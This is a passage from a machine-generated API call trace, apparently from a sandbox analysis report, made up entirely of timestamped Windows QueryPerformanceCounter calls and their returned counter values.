lpPerformanceCount=0x6adfdfc*=3095605687516) returned 1 [0137.238] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095605704332) returned 1 [0137.254] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095607316254) returned 1 [0137.254] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095607332212) returned 1 [0137.270] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095608889203) returned 1 [0137.270] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095608905699) returned 1 [0137.286] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095610489006) returned 1 [0137.286] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095610511909) returned 1 [0137.302] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095612115658) returned 1 [0137.302] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095612131819) returned 1 [0137.321] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095614042687) returned 1 [0137.322] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095614059298) returned 1 [0137.344] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095616351887) returned 1 [0137.345] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095616374399) returned 1 [0137.354] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095617292059) returned 1 [0137.354] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095617313393) returned 1 [0137.370] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095618883718) returned 1 [0137.370] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095618898227) returned 1 [0137.404] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095622291949) returned 1 [0137.404] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095622312461) returned 1 [0137.430] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095624891019) returned 1 [0137.430] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095624914795) returned 1 [0137.465] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095628446072) returned 1 [0137.466] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095628469023) returned 1 [0137.467] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095628555306) returned 1 [0137.467] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095628580179) returned 1 [0137.478] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095629735849) returned 1 [0137.478] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095629752983) returned 1 [0137.494] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095631336523) returned 1 [0137.494] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095631354391) returned 1 [0137.510] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095632941878) returned 1 [0137.511] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095632958942) returned 1 [0137.526] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095634554979) returned 1 [0137.527] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095634582070) returned 1 [0137.542] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095636139251) returned 1 [0137.543] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095636157158) returned 1 [0137.558] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095637737843) returned 1 [0137.559] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095637755039) returned 1 [0137.574] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095639349029) returned 1 [0137.575] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095639373154) returned 1 [0137.625] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095644364950) returned 1 [0137.625] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095644381793) returned 1 [0137.626] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095644468312) returned 1 [0137.626] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095644484701) returned 1 [0137.638] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095645741690) returned 1 [0137.639] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095645764662) returned 1 [0137.654] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095647350824) returned 1 [0137.655] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095647375412) returned 1 [0137.670] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095648914860) returned 1 [0137.670] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095648932390) returned 1 [0137.686] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095650514211) returned 1 [0137.686] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095650530036) returned 1 [0137.702] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095652115049) returned 1 [0137.702] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095652153747) returned 1 [0137.718] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095653718387) returned 1 [0137.718] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095653735991) returned 1 [0137.734] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095655319408) returned 1 [0137.734] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095655337202) returned 1 [0137.750] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095656907588) returned 1 [0137.750] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095656921609) returned 1 [0137.766] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095658506693) returned 1 [0137.766] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095658520948) returned 1 [0137.782] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095660083429) returned 1 [0137.782] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095660139164) returned 1 [0137.798] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095661701822) returned 1 [0137.798] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095661723942) returned 1 [0137.814] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095663286416) returned 1 [0137.814] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095663302982) returned 1 [0137.830] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095664870763) returned 1 [0137.830] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095664886858) returned 1 [0137.845] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095666434100) returned 1 [0137.845] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095666448182) returned 1 [0137.861] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095668052354) returned 1 [0137.862] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095668076934) returned 1 [0137.877] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095669651053) returned 1 [0137.878] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095669675212) returned 1 [0137.893] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095671230653) returned 1 [0137.893] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095671244129) returned 1 [0137.909] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095672838557) returned 1 [0137.910] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095672857112) returned 1 [0137.925] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095674439556) returned 1 [0137.926] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095674455991) returned 1 [0137.941] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095676033403) returned 1 [0137.941] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095676047683) returned 1 [0137.957] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095677638996) returned 1 [0137.958] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095677655497) returned 1 [0137.974] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095679258750) returned 1 [0137.974] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095679282133) returned 1 [0137.999] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095681800697) returned 1 [0137.999] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095681818884) returned 1 [0138.030] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095684902507) returned 1 [0138.030] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095684921398) returned 1 [0138.059] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095687819494) returned 1 [0138.059] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095687838761) returned 1 [0138.111] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095692979891) returned 1 [0138.111] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095692998361) returned 1 [0138.112] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095693077861) returned 1 [0138.112] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095693094729) returned 1 [0138.126] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095694491090) returned 1 [0138.128] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095694714858) returned 1 [0138.147] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095696580665) returned 1 [0138.147] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095696598057) returned 1 [0138.161] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095698001414) returned 1 [0138.164] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095698463823) returned 1 [0138.179] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095699964153) returned 1 [0138.181] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095699986339) returned 1 [0138.224] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095704316696) returned 1 [0138.224] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095704336592) returned 1 [0138.225] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095704475378) returned 1 [0138.226] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095704500413) returned 1 [0138.239] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095705796338) returned 1 [0138.239] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095705823536) returned 1 [0138.255] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095707399474) returned 1 [0138.255] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095707433921) returned 1 [0138.273] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095709219649) returned 1 [0138.273] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095709242973) returned 1 [0138.287] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095710645658) returned 1 [0138.288] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095710678865) returned 1 [0138.303] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095712268910) returned 1 [0138.304] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095712289092) returned 1 [0138.323] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095714256159) returned 1 [0138.324] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095714276775) returned 1 [0138.339] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095715772503) returned 1 [0138.339] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095715808100) returned 1 [0138.355] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095717372519) returned 1 [0138.355] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095717418595) returned 1 [0138.373] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095719166516) returned 1 [0138.373] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095719217381) returned 1 [0138.387] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095720633171) returned 1 [0138.388] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095720656985) returned 1 [0138.403] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095722243109) returned 1 [0138.404] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095722261066) returned 1 [0138.419] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095723816743) returned 1 [0138.419] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095723836147) returned 1 [0138.435] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095725414122) returned 1 [0138.435] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095725430722) returned 1 [0138.451] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095727003312) returned 1 [0138.451] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095727017890) returned 1 [0138.467] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095728569137) returned 1 [0138.467] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095728593459) returned 1 [0138.500] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095731936375) returned 1 [0138.500] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095731954569) returned 1 [0138.507] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095732652394) returned 1 [0138.508] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095732670569) returned 1 [0138.523] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095734213411) returned 1 [0138.523] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095734231383) returned 1 [0138.539] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095735828846) returned 1 [0138.540] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095735948268) returned 1 [0138.555] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095737422156) returned 1 [0138.556] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095737479712) returned 1 [0138.573] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095739162722) returned 1 [0138.573] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095739179427) returned 1 [0138.587] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095740617917) returned 1 [0138.587] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095740631999) returned 1 [0138.603] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095742221260) returned 1 [0138.603] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095742247798) returned 1 [0138.619] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095743815449) returned 1 [0138.619] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095743829797) returned 1 [0138.637] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095745556617) returned 1 [0138.637] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095745574237) returned 1 [0138.652] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095747125715) returned 1 [0138.653] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095747156753) returned 1 [0138.668] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095748749418) returned 1 [0138.669] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095748887617) returned 1 [0138.685] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095750480341) returned 1 [0138.686] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095750551408) returned 1 [0138.701] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095752030691) returned 1 [0138.702] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095752082130) returned 1 [0138.718] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095753707127) returned 1 [0138.719] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095753780886) returned 1 [0138.734] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095755286197) returned 1 [0138.735] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095755384470) returned 1 [0138.749] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095756847077) returned 1 [0138.750] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095756949224) returned 1 [0138.766] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095758536274) returned 1 [0138.767] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095758639060) returned 1 [0138.815] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095763405303) returned 1 [0138.815] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095763421416) returned 1 [0138.832] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095765086110) returned 1 [0138.832] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095765103416) returned 1 [0138.853] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095767240154) returned 1 [0138.857] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095767589023) returned 1 [0138.869] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095768800020) returned 1 [0138.869] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095768829329) returned 1 [0138.885] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095770402183) returned 1 [0138.885] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095770425132) returned 1 [0138.901] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095771976478) returned 1 [0138.901] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095771995874) returned 1 [0138.919] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095773788378) returned 1 [0138.919] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095773813216) returned 1 [0138.935] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095775375288) returned 1 [0138.935] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095775395752) returned 1 [0138.951] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095776989348) returned 1 [0138.951] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095777013054) returned 1 [0138.969] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095778769684) returned 1 [0138.969] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095778787583) returned 1 [0138.985] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095780364631) returned 1 [0138.985] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095780388835) returned 1 [0139.001] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095781955819) returned 1 [0139.001] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095781973853) returned 1 [0139.018] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095783690272) returned 1 [0139.018] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095783708781) returned 1 [0139.040] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095785905899) returned 1 [0139.040] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095785923684) returned 1 [0139.056] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095787468660) returned 1 [0139.056] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095787491765) returned 1 [0139.072] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095789150059) returned 1 [0139.073] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095789169471) returned 1 [0139.088] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: 